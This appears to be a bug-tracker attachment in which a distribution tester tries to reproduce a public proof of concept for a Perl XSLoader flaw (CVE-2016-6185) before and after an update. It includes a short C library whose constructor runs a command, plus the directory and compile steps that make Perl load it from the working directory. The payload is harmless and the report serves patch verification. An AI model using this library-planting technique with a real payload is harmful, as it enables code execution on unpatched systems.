Mageia Bugzilla – Attachment 8339 Details for Bug 18894: perl, perl-XSLoader new security issue CVE-2016-6185
Inconclusive attempt to exercise a PoC
report.poc (text/plain), 1.19 KB, created by Len Lawrence on 2016-08-12 20:08:20 CEST

PoC at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578

$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
         (__)
         (oo)
   /------\/
  / |    ||
 *  /\---/\
    ~~   ~~
..."Have you mooed today?"...
Segmentation fault

$ locate auto/List/MoreUtils/MoreUtils.so
/usr/lib/perl5/vendor_perl/5.20.1/x86_64-linux-thread-multi/auto/List/MoreUtils/MoreUtils.so

moo.c contains:
#include <signal.h>
#include <stdlib.h>
void __attribute__((constructor)) moo() {
    system("apt-get moo");
    kill(0, SIGSEGV);
}

moo seems to be specific to Debian so I replaced the system command with something arbitrary (mageiawelcome in fact).

Ran the three commands above, both before and after the update using modified moo.c.
Directory (eval 1)/auto/List/MoreUtils was created in the cwd and contained the compiled object (executable).

$ file MoreUtils.so
MoreUtils.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=559815b135830038c967dd0a2b486d325b9f0940, not stripped

$ ./MoreUtils.so
Segmentation fault